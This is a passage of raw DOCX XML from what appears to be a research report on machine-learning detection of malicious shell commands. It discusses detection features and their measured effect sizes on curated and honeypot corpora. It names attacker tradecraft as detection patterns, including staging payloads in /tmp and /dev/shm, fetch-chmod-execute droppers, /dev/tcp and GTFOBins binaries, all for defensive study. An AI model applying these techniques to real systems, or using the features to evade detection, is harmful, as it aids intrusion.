            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>./x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Derived / engineered feature(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_staging_dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hidden_path</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> as supporting context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detailed explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4536"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> are chosen by attackers for a structural reason rather than a stylistic one: they are the directories guaranteed to be writable by an unprivileged account, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is memory-backed, so staging there avoids a disk write entirely. That structural necessity is why the feature transfers — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_staging_dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> holds at OR 14.3 on Dataset 1 and 4.75 on Dataset 2, one of the few strong signals that keeps both its sign and its magnitude across corpora. It is also the clearest illustration of why single features are insufficient: developers legitimately use </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> constantly, so the feature earns its weight only in conjunction with a fetch binary, a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, or an execution — which is precisely the conjunction a tree ensemble can represent and a keyword rule cannot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Closing observation — the namesake signal points the wrong way.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Across these</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>four rows and Ben's three, the features that behave most consistently are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>structural (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_staging_dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hidden_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_tcp</w:t>
      </w:r>
      <w:r>
        <w:t>), while the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">features naming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>what program ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> behave worst. The extreme case is the family</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the project is named after: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carries OR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.62</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 1 and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 2, and the positional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_lotl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reaches OR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.09</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dataset 2 — meaning a command that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>starts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a GTFOBins-catalogued binary is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>roughly eleven times more likely to be labelled benign than malicious. This is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not a modelling failure; it is the correct empirical answer to a provenance-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">labelled question. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>awk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are overwhelmingly used for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>their intended purpose, so under labels inherited from collection context their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>presence is evidence of ordinary administration. It sharpens Ben's T1033</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>conclusion: some behaviours have no content signature, and some have one that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>points in the wrong direction. Detection of LotL abuse therefore cannot rest on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>recognising the binary, only on the argument structure wrapped around it — which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is the design premise of the feature set set out in Section 1.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1.3 — Theoretical Feature Rationale (43 features, 8 families)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Every feature below is in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FEATURE_NAMES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>). Effect sizes are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">quoted from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_feature_decisions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (train splits only): Cliff's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">delta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> for continuous features, odds ratio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> for binary ones, on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Dataset 1 and Dataset 2 respectively. The per-feature evidence table ships as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>an appendix; this section gives the security reasoning that motivated each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">family </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> the evidence was gathered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The feature set was designed to answer one question: **what, in a command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>string, distinguishes adversarial intent from ordinary administration when the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>program being run is legitimate in both cases?** Sixty-eight candidates were</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>proposed from the threat model in Section 1.2, then reduced to 43 by a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>pre-registered selection gate applied identically to both corpora. The 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rejections are retained with their evidence, because a feature that was built,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>measured and discarded is part of the argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two design commitments run through every family. First, **no single feature is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>expected to separate the classes.** The do-nothing floor — the F1 obtained by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>labelling every command an attack at 25% prevalence — is 0.40. On Dataset 1 only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>three of the 43 clear it as a solo rule (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.595, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0.434, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.411); on Dataset 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not one feature does</w:t>
      </w:r>
      <w:r>
        <w:t>, which is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the most compact statement available of how much harder the honeypot corpus is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The set is built for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>conjunctions</w:t>
      </w:r>
      <w:r>
        <w:t>, which is what a tree ensemble or a CNN can</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">represent and a keyword rule cannot. Second, **the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column is never a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>model input**, so no feature may be a proxy for collection provenance; where one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>turned out to be (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> saturating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:t>), it is flagged rather than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quietly dropped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Shape and size (4) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t>.** The premise is that attack one-liners are compressed: a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dropper chains fetch, permission change and execution into a single line because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the operator has one shot through a command-injection primitive, whereas an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>administrator works interactively across several short commands. Long individual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>tokens are a second, distinct signal — URLs, encoded blobs and absolute paths all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">produce them, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fires where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> may not. The measured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>result is the sharpest warning in the chapter: the premise holds on the curated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d +0.25) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>inverts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the honeypot (d −0.17), because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>real attacker input at a Cowrie prompt is terse recon while real user history is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>verbose. All four sit exactly at the 0.40 floor on solo F1. They are retained as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cheap split variables and context for other features, not as evidence in their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>own right, and they are the primary exhibit for the distribution shift analysed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in Chapter 5.2. Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keeps its sign on both corpora (+0.16 /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>+0.20).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Structure and chaining (4) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_stderr_merge</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
